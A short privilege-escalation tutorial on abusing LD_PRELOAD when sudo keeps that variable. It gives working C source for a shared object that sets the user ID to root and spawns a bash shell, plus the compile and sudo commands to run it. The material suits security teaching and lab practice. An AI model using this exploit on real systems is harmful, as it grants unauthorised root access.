LD_PRELOAD

LD_PRELOAD is an environment variable which can be set to the path of a shared object (.so) file. When set, the shared object will be loaded before any others. By creating a custom shared object and creating an init() function, we can execute code as soon as the object is loaded.

Limitations

LD_PRELOAD will not work if the real user ID is different from the effective user ID. sudo must be configured to preserve the LD_PRELOAD environment variable using the env_keep option.

List the programs your user is allowed to run via sudo -l

Note that the env_keep option includes the LD_PRELOAD environment variable.

Exploitation

Create a file (preload.c) with the following contents:

#include <stdio.h>
#include <stdlib.h>
static void hijack() __attribute__((constructor));
void hijack() {
unsetenv("LD_LIBRARY_PATH");
setresuid(0,0,0);
system("/bin/bash -p");
}

Compile preload.c to preload.so:

gcc -fPIC -shared -nostartfiles -o /tmp/preload.so preload.c

Run any allowed program using sudo, while setting the LD_PRELOAD environment variable to the full path of the preload.so file:

sudo LD_PRELOAD=/tmp/preload.so apache2